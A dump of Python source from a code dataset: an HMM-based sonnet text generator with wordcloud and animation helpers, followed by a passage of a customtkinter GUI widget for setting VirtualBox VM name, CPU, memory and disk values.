sonnet:\n current_sonnet.append(word_dict_[word])\n all_sonnet_int_.append(current_sonnet)\n from nltk.corpus import cmudict\n\n d = cmudict.dict()\n for word in all_words_:\n # Number of digits in NLTK (i.e. number of vowel stress marks) approximates number of syllables\n try:\n num_syls = len([y for y in d[word][-1] if y[-1].isdigit()])\n syllable_dict_[word] = [num_syls]\n except:\n syllable_dict_[word] = [count_syllables(word)]\n \n return all_words_, all_sequences_, word_dict_, all_sonnet_int_, syllable_dict_\n\n###############################################################################\n# RNN Helper Functions\n###############################################################################\n## Helper function for pretty time\nimport time \nimport math\ndef timeSince(since):\n now = time.time()\n s = now - since\n m = math.floor(s / 60)\n s -= m * 60\n return '%dm %ds' % (m, s)\n\n\n###############################################################################\n# HMM model\n###############################################################################\nimport numpy as np \nimport random\n\nclass HiddenMarkovModel:\n '''\n Class implementation of Hidden Markov Models.\n '''\n\n def __init__(self, A, O):\n '''\n Initializes an HMM. Assumes the following:\n - States and observations are integers starting from 0. \n - There is a start state (see notes on A_start below). There\n is no integer associated with the start state, only\n probabilities in the vector A_start.\n - There is no end state. 
\n\n Arguments:\n A: Transition matrix with dimensions L x L.\n The (i, j)^th element is the probability of\n transitioning from state i to state j. Note that\n this does not include the starting probabilities.\n\n O: Observation matrix with dimensions L x D.\n The (i, j)^th element is the probability of\n emitting observation j given state i.\n\n Parameters:\n L: Number of states.\n\n D: Number of observations.\n \n A: The transition matrix.\n \n O: The observation matrix.\n \n A_start: Starting transition probabilities. The i^th element\n is the probability of transitioning from the start\n state to state i. For simplicity, we assume that\n this distribution is uniform.\n '''\n\n self.L = len(A)\n self.D = len(O[0])\n self.A = A\n self.O = O\n self.A_start = [1. / self.L for _ in range(self.L)]\n\n\n def viterbi(self, x):\n '''\n Uses the Viterbi algorithm to find the max probability state \n sequence corresponding to a given input sequence.\n\n Arguments:\n x: Input sequence in the form of a list of length M,\n consisting of integers ranging from 0 to D - 1.\n\n Returns:\n max_seq: Output sequence corresponding to x with the highest\n probability.\n '''\n\n M = len(x) # Length of sequence.\n\n # The (i, j)^th elements of probs and seqs are the max probability\n # of the prefix of length i ending in state j and the prefix\n # that gives this probability, respectively.\n #\n # For instance, probs[1][0] is the probability of the prefix of\n # length 1 ending in state 0.\n probs = [[0. for _ in range(self.L)] for _ in range(M + 1)]\n seqs = [['' for _ in range(self.L)] for _ in range(M + 1)]\n\n # Calculate initial prefixes and probabilities.\n for curr in range(self.L):\n probs[1][curr] = self.A_start[curr] * self.O[curr][x[0]]\n seqs[1][curr] = str(curr)\n\n # Calculate best prefixes and probabilities throughout sequence.\n for t in range(2, M + 1):\n # Iterate over all possible current states.\n for curr in range(self.L):\n max_prob = float(\"-inf\")\n max_prefix = ''\n\n # Iterate over all possible previous states to find one\n # that would maximize the probability of the current state.\n for prev in range(self.L):\n curr_prob = probs[t - 1][prev] \\\n * self.A[prev][curr] \\\n * self.O[curr][x[t - 1]]\n\n # Continually update max probability and prefix.\n if curr_prob >= max_prob:\n max_prob = curr_prob\n max_prefix = seqs[t - 1][prev]\n\n # Store the max probability and prefix.\n probs[t][curr] = max_prob\n seqs[t][curr] = max_prefix + str(curr)\n\n # Find the index of the max probability of a sequence ending in x^M\n # and the corresponding output sequence.\n max_i = max(enumerate(probs[-1]), key=lambda x: x[1])[0]\n max_seq = seqs[-1][max_i]\n\n return max_seq\n\n\n def forward(self, x, normalize=False):\n '''\n Uses the forward algorithm to calculate the alpha probability\n vectors corresponding to a given input sequence.\n\n Arguments:\n x: Input sequence in the form of a list of length M,\n consisting of integers ranging from 0 to D - 1.\n\n normalize: Whether to normalize each set of alpha_j(i) vectors\n at each i. This is useful to avoid underflow in\n unsupervised learning.\n\n Returns:\n alphas: Vector of alphas.\n\n The (i, j)^th element of alphas is alpha_j(i),\n i.e. the probability of observing prefix x^1:i\n and state y^i = j.\n\n e.g. alphas[1][0] corresponds to the probability\n of observing x^1:1, i.e. the first observation,\n given that y^1 = 0, i.e. the first state is 0.\n '''\n\n M = len(x) # Length of sequence.\n alphas = [[0. 
for _ in range(self.L)] for _ in range(M + 1)]\n\n # Note that alpha_j(0) is already correct for all j's.\n # Calculate alpha_j(1) for all j's.\n for curr in range(self.L):\n alphas[1][curr] = self.A_start[curr] * self.O[curr][x[0]]\n\n # Calculate alphas throughout sequence.\n for t in range(1, M):\n # Iterate over all possible current states.\n for curr in range(self.L):\n prob = 0\n\n # Iterate over all possible previous states to accumulate\n # the probabilities of all paths from the start state to\n # the current state.\n for prev in range(self.L):\n prob += alphas[t][prev] \\\n * self.A[prev][curr] \\\n * self.O[curr][x[t]]\n\n # Store the accumulated probability.\n alphas[t + 1][curr] = prob\n\n if normalize:\n norm = sum(alphas[t + 1])\n for curr in range(self.L):\n alphas[t + 1][curr] /= norm\n\n return alphas\n\n\n def backward(self, x, normalize=False):\n '''\n Uses the backward algorithm to calculate the beta probability\n vectors corresponding to a given input sequence.\n\n Arguments:\n x: Input sequence in the form of a list of length M,\n consisting of integers ranging from 0 to D - 1.\n\n normalize: Whether to normalize each set of alpha_j(i) vectors\n at each i. This is useful to avoid underflow in\n unsupervised learning.\n\n Returns:\n betas: Vector of betas.\n\n The (i, j)^th element of betas is beta_j(i), i.e.\n the probability of observing prefix x^(i+1):M and\n state y^i = j.\n\n e.g. betas[M][0] corresponds to the probability\n of observing x^M+1:M, i.e. no observations,\n given that y^M = 0, i.e. the last state is 0.\n '''\n\n M = len(x) # Length of sequence.\n betas = [[0. for _ in range(self.L)] for _ in range(M + 1)]\n\n # Initialize initial betas.\n for curr in range(self.L):\n betas[-1][curr] = 1\n\n # Calculate betas throughout sequence.\n for t in range(-1, -M - 1, -1):\n # Iterate over all possible current states.\n for curr in range(self.L):\n prob = 0\n\n # Iterate over all possible next states to accumulate\n # the probabilities of all paths from the end state to\n # the current state.\n for nxt in range(self.L):\n if t == -M:\n prob += betas[t][nxt] \\\n * self.A_start[nxt] \\\n * self.O[nxt][x[t]]\n\n else:\n prob += betas[t][nxt] \\\n * self.A[curr][nxt] \\\n * self.O[nxt][x[t]]\n\n # Store the accumulated probability.\n betas[t - 1][curr] = prob\n\n if normalize:\n norm = sum(betas[t - 1])\n for curr in range(self.L):\n betas[t - 1][curr] /= norm\n\n return betas\n\n\n def supervised_learning(self, X, Y):\n '''\n Trains the HMM using the Maximum Likelihood closed form solutions\n for the transition and observation matrices on a labeled\n datset (X, Y). Note that this method does not return anything, but\n instead updates the attributes of the HMM object.\n\n Arguments:\n X: A dataset consisting of input sequences in the form\n of variable-length lists, consisting of integers \n ranging from 0 to D - 1. In other words, a list of\n lists.\n\n Y: A dataset consisting of state sequences in the form\n of lists of variable length, consisting of integers \n ranging from 0 to L - 1. 
In other words, a list of\n lists.\n\n Note that the elements in X line up with those in Y.\n '''\n\n # Calculate each element of A using the M-step formulas.\n for curr in range(self.L):\n for nxt in range(self.L):\n num = 0.\n den = 0.\n\n for i in range(len(X)):\n x = X[i]\n y = Y[i]\n M = len(x)\n \n num += len([1 for i in range(M - 1) \\\n if y[i] == curr and y[i + 1] == nxt])\n den += len([1 for i in range(M - 1) if y[i] == curr])\n\n self.A[curr][nxt] = num / den\n\n # Calculate each element of O using the M-step formulas.\n for curr in range(self.L):\n for xt in range(self.D):\n num = 0.\n den = 0.\n\n for i in range(len(X)):\n x = X[i]\n y = Y[i]\n M = len(x)\n \n num += len([1 for i in range(M) \\\n if y[i] == curr and x[i] == xt])\n den += len([1 for i in range(M) if y[i] == curr])\n\n self.O[curr][xt] = num / den\n\n\n def unsupervised_learning(self, X, N_iters):\n '''\n Trains the HMM using the Baum-Welch algorithm on an unlabeled\n datset X. Note that this method does not return anything, but\n instead updates the attributes of the HMM object.\n\n Arguments:\n X: A dataset consisting of input sequences in the form\n of variable-length lists, consisting of integers ranging\n from 0 to D - 1. In other words, a list of lists.\n\n N_iters: The number of iterations to train on.\n '''\n\n # Note that a comment starting with 'E' refers to the fact that\n # the code under the comment is part of the E-step.\n\n # Similarly, a comment starting with 'M' refers to the fact that\n # the code under the comment is part of the M-step.\n\n for iteration in range(1, N_iters + 1):\n if iteration % 10 == 0:\n print(\"Iteration: \" + str(iteration))\n\n # Numerator and denominator for the update terms of A and O.\n A_num = [[0. for i in range(self.L)] for j in range(self.L)]\n O_num = [[0. for i in range(self.D)] for j in range(self.L)]\n A_den = [0. for i in range(self.L)]\n O_den = [0. for i in range(self.L)]\n\n # For each input sequence:\n for x in X:\n M = len(x)\n # Compute the alpha and beta probability vectors.\n alphas = self.forward(x, normalize=True)\n betas = self.backward(x, normalize=True)\n\n # E: Update the expected observation probabilities for a\n # given (x, y).\n # The i^th index is P(y^t = i, x).\n for t in range(1, M + 1):\n P_curr = [0. for _ in range(self.L)]\n \n for curr in range(self.L):\n P_curr[curr] = alphas[t][curr] * betas[t][curr]\n\n # Normalize the probabilities.\n norm = sum(P_curr)\n for curr in range(len(P_curr)):\n P_curr[curr] /= norm\n\n for curr in range(self.L):\n if t != M:\n A_den[curr] += P_curr[curr]\n O_den[curr] += P_curr[curr]\n O_num[curr][x[t - 1]] += P_curr[curr]\n\n \n # E: Update the expectedP(y^j = a, y^j+1 = b, x) for given (x, y)\n for t in range(1, M):\n P_curr_nxt = [[0. 
for _ in range(self.L)] for _ in range(self.L)]\n\n for curr in range(self.L):\n for nxt in range(self.L):\n P_curr_nxt[curr][nxt] = alphas[t][curr] \\\n * self.A[curr][nxt] \\\n * self.O[nxt][x[t]] \\\n * betas[t + 1][nxt]\n\n # Normalize:\n norm = 0\n for lst in P_curr_nxt:\n norm += sum(lst)\n for curr in range(self.L):\n for nxt in range(self.L):\n P_curr_nxt[curr][nxt] /= norm\n\n # Update A_num\n for curr in range(self.L):\n for nxt in range(self.L):\n A_num[curr][nxt] += P_curr_nxt[curr][nxt]\n\n for curr in range(self.L):\n for nxt in range(self.L):\n self.A[curr][nxt] = A_num[curr][nxt] / A_den[curr]\n\n for curr in range(self.L):\n for xt in range(self.D):\n self.O[curr][xt] = O_num[curr][xt] / O_den[curr]\n\n def generate_emission(self, M):\n '''\n Generates an emission of length M, assuming that the starting state\n is chosen uniformly at random. \n\n Arguments:\n M: Length of the emission to generate.\n\n Returns:\n emission: The randomly generated emission as a list.\n\n states: The randomly generated states as a list.\n '''\n\n emission = []\n state = random.choice(range(self.L))\n states = []\n\n for t in range(M):\n # Append state.\n states.append(state)\n\n # Sample next observation.\n rand_var = random.uniform(0, 1)\n next_obs = 0\n\n while rand_var > 0:\n rand_var -= self.O[state][next_obs]\n next_obs += 1\n\n next_obs -= 1\n emission.append(next_obs)\n\n # Sample next state.\n rand_var = random.uniform(0, 1)\n next_state = 0\n\n while rand_var > 0:\n rand_var -= self.A[state][next_state]\n next_state += 1\n\n next_state -= 1\n state = next_state\n\n return emission, states\n\n\n def probability_alphas(self, x):\n '''\n Finds the maximum probability of a given input sequence using\n the forward algorithm.\n\n Arguments:\n x: Input sequence in the form of a list of length M,\n consisting of integers ranging from 0 to D - 1.\n\n Returns:\n prob: Total probability that x can occur.\n '''\n\n # Calculate alpha vectors.\n alphas = self.forward(x)\n\n # alpha_j(M) gives the probability that the output sequence ends\n # in j. Summing this value over all possible states j gives the\n # total probability of x paired with any output sequence, i.e. the\n # probability of x.\n prob = sum(alphas[-1])\n return prob\n\n\n def probability_betas(self, x):\n '''\n Finds the maximum probability of a given input sequence using\n the backward algorithm.\n\n Arguments:\n x: Input sequence in the form of a list of length M,\n consisting of integers ranging from 0 to D - 1.\n\n Returns:\n prob: Total probability that x can occur.\n '''\n\n betas = self.backward(x)\n\n # beta_j(0) gives the probability of the output sequence. Summing\n # this over all states and then normalizing gives the total\n # probability of x paired with any output sequence, i.e. the\n # probability of x.\n prob = sum([betas[1][k] * self.A_start[k] * self.O[k][x[0]] \\\n for k in range(self.L)])\n\n return prob\n\n\ndef supervised_HMM(X, Y):\n '''\n Helper function to train a supervised HMM. The function determines the\n number of unique states and observations in the given data, initializes\n the transition and observation matrices, creates the HMM, and then runs\n the training function for supervised learning.\n Arguments:\n X: A dataset consisting of input sequences in the form\n of lists of variable length, consisting of integers \n ranging from 0 to D - 1. 
In other words, a list of lists.\n Y: A dataset consisting of state sequences in the form\n of lists of variable length, consisting of integers \n ranging from 0 to L - 1. In other words, a list of lists.\n Note that the elements in X line up with those in Y.\n '''\n # Make a set of observations.\n observations = set()\n for x in X:\n observations |= set(x)\n\n # Make a set of states.\n states = set()\n for y in Y:\n states |= set(y)\n \n # Compute L and D.\n L = len(states)\n D = len(observations)\n\n # Randomly initialize and normalize matrix A.\n A = [[random.random() for i in range(L)] for j in range(L)]\n\n for i in range(len(A)):\n norm = sum(A[i])\n for j in range(len(A[i])):\n A[i][j] /= norm\n \n # Randomly initialize and normalize matrix O.\n O = [[random.random() for i in range(D)] for j in range(L)]\n\n for i in range(len(O)):\n norm = sum(O[i])\n for j in range(len(O[i])):\n O[i][j] /= norm\n\n # Train an HMM with labeled data.\n HMM = HiddenMarkovModel(A, O)\n HMM.supervised_learning(X, Y)\n\n return HMM\n\ndef unsupervised_HMM(X, n_states, N_iters,rng=np.random.RandomState(1)):\n '''\n Helper function to train an unsupervised HMM. The function determines the\n number of unique observations in the given data, initializes\n the transition and observation matrices, creates the HMM, and then runs\n the training function for unsupervised learing.\n Arguments:\n X: A dataset consisting of input sequences in the form\n of lists of variable length, consisting of integers \n ranging from 0 to D - 1. In other words, a list of lists.\n n_states: Number of hidden states to use in training.\n \n N_iters: The number of iterations to train on.\n rng: The random number generator for reproducible result.\n Default to RandomState(1).\n '''\n\n # Make a set of observations.\n observations = set()\n for x in X:\n observations |= set(x)\n \n # Compute L and D.\n L = n_states\n D = len(observations)\n\n # Randomly initialize and normalize matrix A.\n A = [[rng.random() for i in range(L)] for j in range(L)]\n\n for i in range(len(A)):\n norm = sum(A[i])\n for j in range(len(A[i])):\n A[i][j] /= norm\n \n # Randomly initialize and normalize matrix O.\n O = [[rng.random() for i in range(D)] for j in range(L)]\n\n for i in range(len(O)):\n norm = sum(O[i])\n for j in range(len(O[i])):\n O[i][j] /= norm\n\n # Train an HMM with unlabeled data.\n HMM = HiddenMarkovModel(A, O)\n HMM.unsupervised_learning(X, N_iters)\n\n return HMM\n\n\n###############################################################################\n# CS/CNS/EE 155 2018\n# Problem Set 6\n#\n# Author: Andrew Kang\n# Description: Set 6 HMM helper\n###############################################################################\n\nimport re\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom wordcloud import WordCloud\nfrom matplotlib import animation\nfrom matplotlib.animation import FuncAnimation\n\n\n####################\n# WORDCLOUD FUNCTIONS\n####################\n\ndef mask():\n # Parameters.\n r = 128\n d = 2 * r + 1\n\n # Get points in a circle.\n y, x = np.ogrid[-r:d-r, -r:d-r]\n circle = (x**2 + y**2 <= r**2)\n\n # Create mask.\n mask = 255 * np.ones((d, d), dtype=np.uint8)\n mask[circle] = 0\n\n return mask\n\ndef text_to_wordcloud(text, max_words=50, title='', show=True):\n plt.close('all')\n\n # Generate a wordcloud image.\n wordcloud = WordCloud(random_state=0,\n max_words=max_words,\n background_color='white',\n mask=mask()).generate(text)\n\n # Show the image.\n if show:\n plt.imshow(wordcloud, 
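# --- Editor's annotation (not part of the dataset record above) ---
# Hedged usage sketch: a tiny end-to-end run of the HMM helpers above with a
# toy observation alphabet {0, 1, 2} and two hidden states. The sequences are
# illustrative, not drawn from the sonnet corpus.
toy_X = [[0, 1, 2, 1, 0], [2, 1, 0, 0, 1], [1, 1, 2, 0, 2]]
toy_hmm = unsupervised_HMM(toy_X, n_states=2, N_iters=10)
emission, states = toy_hmm.generate_emission(5)
print(emission, states)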
interpolation='bilinear')\n plt.axis('off')\n plt.title(title, fontsize=24)\n plt.show()\n\n return wordcloud\n\ndef states_to_wordclouds(hmm, obs_map, max_words=50, show=True):\n # Initialize.\n M = 100000\n n_states = len(hmm.A)\n obs_map_r = obs_map_reverser(obs_map)\n wordclouds = []\n\n # Generate a large emission.\n emission, states = hmm.generate_emission(M)\n\n # For each state, get a list of observations that have been emitted\n # from that state.\n obs_count = []\n for i in range(n_states):\n obs_lst = np.array(emission)[np.where(np.array(states) == i)[0]]\n obs_count.append(obs_lst)\n\n # For each state, convert it into a wordcloud.\n for i in range(n_states):\n obs_lst = obs_count[i]\n sentence = [obs_map_r[j] for j in obs_lst]\n sentence_str = ' '.join(sentence)\n\n wordclouds.append(text_to_wordcloud(sentence_str, max_words=max_words, title='State %d' % i, show=show))\n\n return wordclouds\n\n\n####################\n# HMM FUNCTIONS\n####################\n\ndef parse_observations(text):\n # Convert text to dataset.\n lines = [line.split() for line in text.split('\\n') if line.split()]\n\n obs_counter = 0\n obs = []\n obs_map = {}\n\n for line in lines:\n obs_elem = []\n \n for word in line:\n word = re.sub(r'[^\\w]', '', word).lower()\n if word not in obs_map:\n # Add unique words to the observations map.\n obs_map[word] = obs_counter\n obs_counter += 1\n \n # Add the encoded word.\n obs_elem.append(obs_map[word])\n \n # Add the encoded sequence.\n obs.append(obs_elem)\n\n return obs, obs_map\n\ndef obs_map_reverser(obs_map):\n obs_map_r = {}\n\n for key in obs_map:\n obs_map_r[obs_map[key]] = key\n\n return obs_map_r\n\ndef sample_sentence(hmm, obs_map, n_words=100):\n # Get reverse map.\n obs_map_r = obs_map_reverser(obs_map)\n # Sample and convert sentence.\n emission, states = hmm.generate_emission(n_words)\n sentence = [obs_map_r[i] for i in emission]\n \n# if start_word:\n# sentence[0]=obs_map_r[start_word]\n\n return ' '.join(sentence).capitalize()+\"...\"\n\n####################\n# HMM VISUALIZATION FUNCTIONS\n####################\n\ndef visualize_sparsities(hmm, O_max_cols=50, O_vmax=0.1):\n plt.close('all')\n plt.set_cmap('viridis')\n\n # Visualize sparsity of A.\n plt.imshow(hmm.A, vmax=1.0)\n plt.colorbar()\n plt.title('Sparsity of A matrix')\n plt.show()\n\n # Visualize parsity of O.\n plt.imshow(np.array(hmm.O)[:, :O_max_cols], vmax=O_vmax, aspect='auto')\n plt.colorbar()\n plt.title('Sparsity of O matrix')\n plt.show()\n\n\n####################\n# HMM ANIMATION FUNCTIONS\n####################\n\ndef animate_emission(hmm, obs_map, M=8, height=12, width=12, delay=1):\n # Parameters.\n lim = 1200\n text_x_offset = 40\n text_y_offset = 80\n x_offset = 580\n y_offset = 520\n R = 420\n r = 100\n arrow_size = 20\n arrow_p1 = 0.03\n arrow_p2 = 0.02\n arrow_p3 = 0.06\n \n # Initialize.\n n_states = len(hmm.A)\n obs_map_r = obs_map_reverser(obs_map)\n wordclouds = states_to_wordclouds(hmm, obs_map, max_words=20, show=False)\n\n # Initialize plot. 
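# --- Editor's annotation (not part of the dataset record above) ---
# Hedged sketch: parse_observations() and obs_map_reverser() above round-trip
# text through integer codes; decoding an encoded line recovers the words:
obs, obs_map = parse_observations("shall i compare thee\nto a summers day")
rev = obs_map_reverser(obs_map)
assert [rev[i] for i in obs[0]] == ["shall", "i", "compare", "thee"]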
\n fig, ax = plt.subplots()\n fig.set_figheight(height)\n fig.set_figwidth(width)\n ax.grid('off')\n plt.axis('off')\n ax.set_xlim([0, lim])\n ax.set_ylim([0, lim])\n\n # Plot each wordcloud.\n for i, wordcloud in enumerate(wordclouds):\n x = x_offset + int(R * np.cos(np.pi * 2 * i / n_states))\n y = y_offset + int(R * np.sin(np.pi * 2 * i / n_states))\n ax.imshow(wordcloud.to_array(), extent=(x - r, x + r, y - r, y + r), aspect='auto', zorder=-1)\n\n # Initialize text.\n text = ax.text(text_x_offset, lim - text_y_offset, '', fontsize=24)\n \n # Make the arrows.\n zorder_mult = n_states ** 2 * 100\n arrows = []\n for i in range(n_states):\n row = []\n for j in range(n_states):\n # Arrow coordinates.\n x_i = x_offset + R * np.cos(np.pi * 2 * i / n_states)\n y_i = y_offset + R * np.sin(np.pi * 2 * i / n_states)\n x_j = x_offset + R * np.cos(np.pi * 2 * j / n_states)\n y_j = y_offset + R * np.sin(np.pi * 2 * j / n_states)\n \n dx = x_j - x_i\n dy = y_j - y_i\n d = np.sqrt(dx**2 + dy**2)\n\n if i != j:\n arrow = ax.arrow(x_i + (r/d + arrow_p1) * dx + arrow_p2 * dy,\n y_i + (r/d + arrow_p1) * dy + arrow_p2 * dx,\n (1 - 2 * r/d - arrow_p3) * dx,\n (1 - 2 * r/d - arrow_p3) * dy,\n color=(1 - hmm.A[i][j], ) * 3,\n head_width=arrow_size, head_length=arrow_size,\n zorder=int(hmm.A[i][j] * zorder_mult))\n else:\n arrow = ax.arrow(x_i, y_i, 0, 0,\n color=(1 - hmm.A[i][j], ) * 3,\n head_width=arrow_size, head_length=arrow_size,\n zorder=int(hmm.A[i][j] * zorder_mult))\n\n row.append(arrow)\n arrows.append(row)\n\n emission, states = hmm.generate_emission(M)\n\n def animate(i):\n if i >= delay:\n i -= delay\n\n if i == 0:\n arrows[states[0]][states[0]].set_color('red')\n elif i == 1:\n arrows[states[0]][states[0]].set_color((1 - hmm.A[states[0]][states[0]], ) * 3)\n arrows[states[i - 1]][states[i]].set_color('red')\n else:\n arrows[states[i - 2]][states[i - 1]].set_color((1 - hmm.A[states[i - 2]][states[i - 1]], ) * 3)\n arrows[states[i - 1]][states[i]].set_color('red')\n\n # Set text.\n text.set_text(' '.join([obs_map_r[e] for e in emission][:i+1]).capitalize())\n\n return arrows + [text]\n\n # Animate!\n print('\\nAnimating...')\n anim = FuncAnimation(fig, animate, frames=M+delay, interval=1000)\n\n return anim\n\n\n","repo_name":"mchuapoco/loan-sharks","sub_path":"poems/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":38018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42011869932","text":"import customtkinter as ctk\nfrom existencecontroller.controller import launch_vboxmanage_lst_command\nfrom gui.guistandard import GuiStandard\n\n\nclass VboxConfigsWidget(GuiStandard):\n\n def __init__(self, master, provisions_configs):\n self.provisions_configs = provisions_configs\n self.vbox_list = launch_vboxmanage_lst_command()\n ctk.CTkFrame.__init__(self, master)\n self.set_fonts()\n self.set_std_dimensions()\n self.initialize_elements()\n self.render_elements()\n\n def set_std_dimensions(self):\n self.padx_std = (20, 20)\n self.pady_std = (10, 10)\n self.pady_up = (10, 0)\n self.pady_down = (0, 10)\n self.pady_title = (10, 2)\n self.pady_entry = (2, 10)\n self.ipadx_std = 10\n self.ipady_std = 10\n self.entry_height_std = 40\n self.sticky_title = 'wn'\n self.sticky_label = 'w'\n self.sticky_entry = 'w'\n self.sticky_frame = 'wens'\n self.sticky_horizontal = 'we'\n\n def set_fonts(self):\n family = 'Sans'\n self.font_std = ctk.CTkFont(family=family, size=18)\n self.warning_font = ctk.CTkFont(family=family, size=11)\n\n 
def initialize_elements(self):\n self._intialize_subframes()\n self._initialize_vbox_subframe_elements()\n self._initialize_cpus_subframe_elements()\n self._initialize_memory_subframe_elements()\n self._initialize_disk_size_subframe_elements()\n\n def render_elements(self):\n self._render_vbox_subframe_elements()\n self._render_cpus_subframe_elements()\n self._render_memory_subframe_elements()\n self._render_disk_size_subframe_elements()\n self._render_subframes()\n\n def _intialize_subframes(self):\n self.vbox_subframe = ctk.CTkFrame(self)\n self.cpus_subframe = ctk.CTkFrame(self)\n self.memory_subframe = ctk.CTkFrame(self)\n self.disk_size_subframe = ctk.CTkFrame(self)\n\n def _initialize_vbox_subframe_elements(self):\n self.vbox_name_label = ctk.CTkLabel(\n master=self.vbox_subframe,\n text=\"Virtual box name:\",\n font=self.font_std\n )\n self.vbox_name_entry = ctk.CTkEntry(\n master=self.vbox_subframe,\n font=self.font_std,\n height=self.entry_height_std,\n placeholder_text='Virtualbox name to be created'\n )\n if self.provisions_configs[\"configurations\"]['vbox_name'][\"default\"]:\n self.vbox_name_entry.insert(\n 0,\n self.provisions_configs[\"configurations\"]['vbox_name'][\"default\"]\n )\n self.warning_label_vbox = ctk.CTkLabel(\n master=self.vbox_subframe,\n font=self.warning_font,\n text=\"\"\n )\n self.vbox_name_entry.bind(\"\", self._vbox_name_check)\n self.vbox_name_entry.bind(\"\", self._vbox_name_check)\n self.warning_label_vbox = ctk.CTkLabel(\n master=self.vbox_subframe,\n font=self.warning_font,\n text_color='red',\n text=\"\"\n )\n if self.provisions_configs[\"configurations\"]['vbox_name'] in self.vbox_list:\n self.warning_label_vbox.configure(\n text='A box with this name already exists',\n )\n\n def _initialize_cpus_subframe_elements(self):\n self.cpus_label = ctk.CTkLabel(\n master=self.cpus_subframe,\n font=self.font_std,\n text='Specify CPUs number'\n )\n self.cpus_value = ctk.IntVar()\n self.cpus_value.set(2)\n if self.provisions_configs[\"configurations\"][\"cpus\"][\"default\"]:\n self.cpus_value.set(\n int(self.provisions_configs[\"configurations\"][\"cpus\"][\"default\"])\n )\n self.cpus_slider = ctk.CTkSlider(\n master=self.cpus_subframe,\n variable=self.cpus_value,\n from_=1,\n to=8,\n number_of_steps=7,\n command=self._show_cpus_slider_value\n )\n self.cpus_slider_label = ctk.CTkLabel(\n master=self.cpus_subframe,\n text=\"\",\n width=250\n )\n\n def _initialize_memory_subframe_elements(self):\n self.memory_label = ctk.CTkLabel(\n master=self.memory_subframe,\n font=self.font_std,\n text='Specify Memory in MB'\n )\n self.memory_var = ctk.IntVar()\n self.memory_var.set(8192)\n if self.provisions_configs[\"configurations\"][\"memory\"][\"default\"]:\n self.memory_var.set(\n int(self.provisions_configs[\"configurations\"][\"memory\"][\"default\"])\n )\n self.memory_slider = ctk.CTkSlider(\n master=self.memory_subframe,\n variable=self.memory_var,\n from_=2,\n to=16384,\n number_of_steps=8191,\n command=self._show_memory_slider_value\n )\n\n self.combo_value_memory = ctk.CTkComboBox(\n master=self.memory_subframe,\n variable=self.memory_var,\n font=self.font_std,\n values=[\"2\", \"4\", \"8\", \"16\", \"32\", \"64\", \"128\", \"256\", \"512\",\n \"1024\", \"2048\", \"4096\", \"8192\", \"16384\"],\n command=self._show_memory_slider_value\n )\n self.slider_memory_label = ctk.CTkLabel(\n self.memory_subframe,\n text=\"\",\n )\n self.combo_value_memory.bind(\n '',\n self._show_memory_value_with_keyrelease\n )\n\n def 
_initialize_disk_size_subframe_elements(self):\n self.disk_label = ctk.CTkLabel(\n master=self.disk_size_subframe,\n font=self.font_std,\n text='Specify Disk Size in MB'\n )\n self.disk_slider_value = ctk.IntVar()\n self.disk_slider_value.set(30)\n self.disk_slider = ctk.CTkSlider(\n master=self.disk_size_subframe,\n variable=self.disk_slider_value,\n from_=4,\n to=2048,\n number_of_steps=2044,\n command=self._show_disk_size_value\n )\n self.disk_entry = ctk.CTkEntry(\n master=self.disk_size_subframe,\n font=self.font_std,\n )\n if self.provisions_configs[\"configurations\"][\"disk_size\"][\"default\"]:\n self.disk_slider_value.set(\n int(self.provisions_configs[\"configurations\"][\"disk_size\"][\"default\"])\n )\n self.disk_entry.insert(\n 0,\n self.disk_slider_value.get()\n )\n self.disk_slider_label = ctk.CTkLabel(\n master=self.disk_size_subframe,\n text=\"\",\n width=250\n )\n self.disk_entry.bind(\n '',\n self._show_disk_size_value_with_keyrelease\n )\n self.disk_slider.bind(\n '',\n self._set_disk_size_entry\n )\n self.disk_slider.bind(\n '',\n self._set_disk_size_entry\n )\n\n def _render_subframes(self):\n self.columnconfigure(0, weight=1)\n self.rowconfigure(0, weight=1)\n self.rowconfigure(1, weight=1)\n self.rowconfigure(2, weight=1)\n self.rowconfigure(3, weight=1)\n self.vbox_subframe.grid(\n row=0,\n column=0,\n sticky=self.sticky_frame,\n padx=self.padx_std,\n pady=self.pady_up\n )\n self.cpus_subframe.grid(\n row=1,\n column=0,\n sticky=self.sticky_frame,\n padx=self.padx_std,\n pady=self.pady_up\n )\n self.memory_subframe.grid(\n row=2,\n column=0,\n sticky=self.sticky_frame,\n padx=self.padx_std,\n pady=self.pady_up\n )\n self.disk_size_subframe.grid(\n row=3,\n column=0,\n sticky=self.sticky_frame,\n padx=self.padx_std,\n pady=self.pady_std\n )\n\n def _render_vbox_subframe_elements(self):\n self.vbox_subframe.columnconfigure(0, weight=1)\n self.vbox_subframe.rowconfigure(0, weight=1)\n self.vbox_subframe.rowconfigure(1, weight=1)\n self.vbox_subframe.rowconfigure(2, weight=1)\n self.vbox_name_label.grid(\n row=0,\n column=0,\n columnspan=2,\n padx=self.padx_std,\n pady=self.pady_title,\n sticky=self.sticky_label\n )\n self.vbox_name_entry.grid(\n row=1,\n column=0,\n padx=self.padx_std,\n pady=self.pady_entry,\n sticky=self.sticky_horizontal\n )\n self.warning_label_vbox.grid(\n row=2,\n column=0,\n padx=self.padx_std,\n pady=0,\n sticky=self.sticky_label\n )\n self.warning_label_vbox.grid(\n row=2,\n column=0,\n padx=self.padx_std,\n pady=0,\n sticky=self.sticky_label\n )\n\n def _render_cpus_subframe_elements(self):\n self.cpus_subframe.columnconfigure(0, weight=1)\n self.cpus_subframe.rowconfigure(0, weight=1)\n self.cpus_subframe.rowconfigure(1, weight=1)\n self.cpus_subframe.rowconfigure(2, weight=1)\n self.cpus_label.grid(\n row=0,\n column=0,\n sticky=self.sticky_label,\n padx=self.padx_std,\n pady=self.pady_title\n )\n self.cpus_slider.grid(\n row=1,\n column=0,\n sticky=self.sticky_horizontal,\n padx=self.padx_std,\n pady=self.pady_title\n )\n self.cpus_slider_label.grid(\n row=2,\n column=0,\n padx=self.padx_std,\n pady=self.pady_std\n )\n self._show_cpus_slider_value(self.cpus_slider.get())\n\n def _render_memory_subframe_elements(self):\n self.memory_subframe.columnconfigure(0, weight=1)\n self.memory_subframe.columnconfigure(1, weight=0)\n self.memory_subframe.rowconfigure(0, weight=1)\n self.memory_subframe.rowconfigure(1, weight=1)\n self.memory_subframe.rowconfigure(2, weight=1)\n self.memory_label.grid(\n row=0,\n column=0,\n 
